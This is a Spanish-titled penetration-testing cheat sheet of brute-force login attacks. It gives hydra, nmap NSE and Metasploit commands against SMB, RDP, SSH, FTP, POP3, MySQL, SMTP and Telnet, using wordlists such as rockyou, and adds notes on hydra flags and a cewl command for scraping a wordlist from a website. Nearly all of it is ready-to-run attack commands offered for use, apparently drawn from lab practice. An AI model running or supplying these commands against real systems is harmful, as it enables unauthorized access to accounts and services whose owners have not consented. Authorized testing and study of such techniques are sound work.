***********************************************************
****** Comandos  utiles para ataques de fuerza bruta ******
***********************************************************

--------------------------------------------------------------------------
 ## SMB bruteforece
 
 nmap --script=smb-brute.nse <Target> 
 nmap -sV -p 445 --script smb-brute <Target>
 
--------------------------------------------------------------------------
  ## RDP bruteforce
  
  hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<Target>

--------------------------------------------------------------------------
  ## SSH bruteforce

hydra -l root -P /usr/share/wordlists/rockyou.txt <Target> ssh
hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ssh

hydra -t 4 -L /usr/share/wordlists/cristi.txt -p some_passsword 192.168.13.236 ssh
hydra -t 4 -l root -P /usr/share/wordlists/cristi-passwords.txt 127.0.0.1 -s 50000 ssh


--------------------------------------------------------------------------
## Bruteforce FTP

hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt <Target> ftp

Metasploit: auxiliary/scanner/ftp/ftp_login


--------------------------------------------------------------------------
  ##Bruteforce POP3

hydra -l root -P /usr/share/wordlists/rockyou.txt <Target> pop3


--------------------------------------------------------------------------
## MySQL bruteforce

nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <target>


--------------------------------------------------------------------------
## SMTP brute force

hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <Target> smtp

<<<NOTAS>>>

-l LOGIN name
-P load several passwords from FILE
-s port
-v verbose mode
-V show login+pass combination for each attempt
-t run TASKS number of connects in parallel
-w waittime for responses (32s) / between connects per thread
-f exit after the first found login/password pair


--------------------------------------------------------------------------
## Telnet bruteforce

Metaspploit: use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(telnet_login) > set PASS_FILE password.lst  or unix_passwords.txt
PASS_FILE => passwords.txt
msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(telnet_login) > set THREADS 254
THREADS => 254
msf auxiliary(telnet_login) > set USER_FILE unix_users.txt
USER_FILE => users.txt
msf auxiliary(telnet_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(telnet_login) > run

--------------------------------------------------------------------------
## Generate a wordlist from a webpage
cewl www.megacorpone.com -m 6 -w /rorox/newfilelist.txt 2>/dev/null




